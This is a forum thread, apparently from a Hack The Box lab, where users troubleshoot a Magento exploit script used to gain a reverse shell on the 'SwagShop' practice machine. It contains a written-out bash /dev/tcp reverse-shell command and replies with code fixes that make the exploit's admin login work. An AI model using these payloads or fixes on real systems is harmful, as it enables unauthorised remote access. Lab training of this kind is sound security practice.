SwagShop - errors in script 37811.py

edited October 2019 in Exploits

Hi guys,

I'm pretty new on HTB and trying to hack my first machine "SwagShop".

I am using following command to get the reverse shell: python 37811.py http://10.10.10.140/index.php/admin/ 'bash -c "bash -i >& /dev/tcp/10.10.13.xxx/9001 0>&1"'

In the config section of the script I've set the right user, password and also the correct install date. Also tryed burp suite to find out whats wrong but no clue.

attached my output:
[email protected]:~# python 37811.py http://10.10.10.140/index.php/admin/ 'bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'

Traceback (most recent call last):
File "37811.py", line 55, in
br['login[username]'] = username
File "/usr/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 796, in setitem
self.form[name] = val
File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 1963, in setitem
control = self.find_control(name)
File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 2355, in find_control
return self._find_control(name, type, kind, id, label, predicate, nr)
File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 2446, in _find_control
description)
mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'

Thanks for any advice.

BR
d3vided

Comments

  • edited October 2019

    This error results because for whatever reason, Mechanize is seeing multiple username/password fields. The index parameter must be used to select the correct one. Comment out the following in the script:

    #br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
    #br.form.fixup()
    #br['login[username]'] = username
    #br['login[password]'] = password
    

    And replace it with this:

    userone = br.find_control(name="login[username]", nr=0)
    userone.value = username
    pwone = br.find_control(name="login[password]", nr=0)
    pwone.value = password
    

    This should fix the issue and allow Mechanize to log in. Note that more modification to the script will be required per the Ippsec video and official write-up.

  • Hey Ruri. works great thx. :)

  • I tried this as well but I can't get it working. I execute the scripts with the changes made and then I hit enter and nothing happens. No error message but also no shell.

  • Type your comment> @II0 said:

    I tried this as well but I can't get it working. I execute the scripts with the changes made and then I hit enter and nothing happens. No error message but also no shell.

    I refreshed the value of install_date, when I modified the exploit script. It is stored on a file that you can find by directory browsing through your web connection.

    bumika

Sign In to comment.